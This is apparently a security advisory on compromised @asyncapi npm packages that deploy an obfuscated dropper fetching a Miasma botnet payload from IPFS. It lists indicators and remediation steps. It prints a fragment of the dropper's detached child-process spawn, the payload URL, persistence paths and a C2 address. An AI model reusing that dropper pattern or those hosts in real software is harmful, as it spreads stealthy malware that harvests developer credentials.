



























Socket proactively blocks malicious open source packages in your code.
Socket's Threat Research Team identified three compromised npm packages in the @asyncapi namespace distributing a multi-stage botnet loader. The affected packages are @asyncapi/generator-helpers(v1.1.1), @asyncapi/generator-components(v0.7.1), and @asyncapi/generator(v3.3.1).
Based on current analysis, the compromised packages deploy an obfuscated first-stage payload that downloads an encrypted second-stage payload, identified as Miasma, from IPFS. Users should avoid affected versions, upgrade to patched releases when available, and review developer and CI environments for signs of compromise.

Socket AI Scanner’s analysis of @asyncapi/generator-helpers1.1.1, one of the malicious packages identified in the current Miasma wave, flags the compromised release as confirmed malware.The affected AsyncAPI packages are used in tooling workflows that generate API documentation and client code from AsyncAPI definitions. Because these packages may be imported during normal development or CI execution, the malicious payload does not require a separate install hook to run.
Current analysis indicates:
src/utils.js.sync.js in platform-specific directories disguised as NodeJS.// Analyst note: Obfuscated first-stage dropper, triggered when the package is required. const { spawn } = require('child_process');
spawn('node', ['-e', downloadStage2Code], { detached: true, stdio: 'ignore', windowsHide: true }).unref();The observed IPFS target is:
hxxps://ipfs[.]io/ipfs/QmQobZSp1wRPrpSEQ56qnyq7ecZh5Bg5k1fnjt4SUwwHb9The second-stage payload persists to:
~/Library/Application Support/NodeJS/sync.js~/.local/share/NodeJS/sync.js%LOCALAPPDATA%\NodeJS\sync.jsWe are still analyzing the payload but the current findings indicate the decrypted second-stage payload is a botnet framework with capabilities for shell command execution, file operations, credential harvesting, evasion checks, persistence, and multi-protocol command and control.
Users should immediately check whether they installed @asyncapi/generator-helpers, @asyncapi/generator-components, or @asyncapi/generator during the affected window. Rotate credentials exposed to systems where these packages were installed, especially npm tokens, GitHub tokens, cloud credentials, SSH keys, and CI secrets.
Security teams should monitor for Node.js processes spawning detached child processes, network connections to 85[.]137[.]53[.]71, and unexpected modifications under .claude, .vscode, .cursorrules, ~/.local/share/NodeJS, or ~/Library/Application Support/NodeJS.
This is an ongoing investigation and we will update findings as the investigation develops.
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。